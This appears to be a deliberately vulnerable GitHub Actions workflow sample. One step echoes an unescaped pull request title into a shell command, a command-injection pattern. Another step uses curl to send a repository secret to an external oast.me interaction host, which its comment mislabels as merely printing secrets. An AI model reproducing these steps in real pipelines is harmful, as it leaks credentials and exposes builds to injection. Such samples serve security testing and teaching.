name: Vulnerable Workflow

on:
  push:
    branches:
      - main

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    # Unsafe step: Executes commands from user-controlled input (e.g., PR's title)
    - name: Run untrusted code
      run: |
        echo "${{ github.event.pull_request.title }}"

    # Displaying secrets without restriction (vulnerable)
    - name: Print secrets (unsafe)
      run: curl "http://crge3bgc3vnr5rqm2820o8w5bgw5tqast.oast.me/?q=$MY_SECRET"
      env:
        MY_SECRET: ${{ secrets.MY_SECRET }}
